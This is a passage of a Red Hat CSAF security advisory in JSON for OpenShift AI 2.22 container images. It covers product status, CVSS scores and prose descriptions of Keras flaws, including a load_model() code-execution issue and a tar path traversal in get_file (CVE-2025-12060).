"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "keras: Arbitary Code execution in Keras load_model()"
},
{
"cve": "CVE-2025-12060",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-10-30T18:01:32.193676+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407443"
}
],
"notes": [
{
"category": "description",
"text": "The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python\u0027s tarfile.extractall function without the filter=\"data\" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder. This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517.\u00a0Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "keras: Keras Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
